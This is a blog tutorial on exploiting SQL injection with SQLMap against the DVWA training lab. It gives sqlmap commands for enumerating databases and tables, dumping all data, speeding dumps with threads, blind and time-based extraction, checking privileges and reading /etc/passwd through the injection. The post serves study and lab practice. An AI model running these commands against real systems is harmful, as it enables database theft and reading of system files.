SQL INJECTION (using SQLMap)

Exploiting SQL Injection:
In this we are going to use tool that exploits SQL injection flaws ; the tool is called SQLMap;
It is powerful and versatile tool that contains a wide array of features some of them are:
  1. Error Based Injection
  2. Blind Injection
  3. Time based Injection
  4. Stacked Queries


Install it:
Introduction to SQLMap:
For demonstrations I have used an open source application DVWA
It takes a GET parameter named id and displays ID, First name, Surname.
For /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# it displayed first user
→ If we increment the ID parameter we will see different ID, First name, Surname
So what i have done here is , I have capture the request in burp suit (will explain in another post) and copied the request to a text file name d.txt

 Let try SQLMap and try to check whether it is exploitable or not:
./sqlmap.py -r d.txt


  1. We get that GET parameter id might be vulnerable to XSS
  2. And back-end DBMS is  ‘MySQL
3.GET parameter ‘id ‘ is vulnerable.
When detection is over , SQLmap show variety of ways to exploit the flaw
Dumping the data-in error -based scenario:
Using -dbs , we can see list of database present in database


Once we have list of database , we select dvwa and dump out tables present inside it.
SQLMap provide the --tables to switch to list the same , but must be used in parallel with -D switch , which tell it which database to chose , while dumping.


We have extracted (dumped) the data from the table
We can use -C to dump specific column from table, but first let us print the column names
Then we select particular column:
→ FOR DUMP ALL: python sqlmap.py -r r.txt --dump-all
Interacting with the Wizard:
There is an interactive setup wizard where SQLMap asks fro thing in detail, one by one, starting with the injection URL.
…………………………..
Some data left.
SQLMap and URL rewriting:




Speeding process !
Multi-threading:
SQLMap runs only one single thread, which is slow. We can utilize --thread switch and specify a value for the number of threads, which ranges from 1 to 10. Increasing the thread increase overall performance of SQL map.
Let try out: First we simply dump all the table from table from database dvwa without thread and note time
Note: time utility to track and monitor the time
Command: → time  python sqlmap.py -r r.txt -D dvwa --dump
Command: →  time  python sqlmap.py -r r.txt -D dvwa --dump --thread 3
DUMPING the data -in blind and time-based scenarios:
Command→ python sqlmap -r blind.txt


time python sqlmap - r blind.txt -D dvwa -T users --dump
time python sqlmap - r blind.txt -D dvwa -T users --dump --predict-output
→ this done to reduce time
Python sqlmap.py  -r blind.txt --privileges
You can see user file privileges is available in image, so we can utilize this to read/write files from the injection if the file system permissions allow this ; MYSQL runs a separate user account to read/ write files to the file system in linux.
Python sqlmap.py -r blind.txt --file-read=/etc/passwd


Comments

Post a Comment

Popular posts from this blog

SQL injection

SQL injection  is technique of inserting nefarious SQL statement into the input field by attacker to a web application for execution  (e.g. to dump the database contents to the attacker) .  SQL injection attacks allow attackers to spoof identity, tampering of data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrator of database server. It is considered as one the top 10 web application vulnerabilities by 2007 and 2010 by the OWASP and rated the number one attack on the OWASP top ten in 2013. The sub-classes of SQL injections are: 1. In-band or Classic SQL Injection 2. Inferentital or Blind SQL Injection 3. Outband SQL Injection (I). Classic SQL Injection:  It is most common and easy to exploit Injection attacks. This occur when an attacker is able to use the same communication channel to both launch the attack and gather result. There are two types of classic SQL injection technique
Read more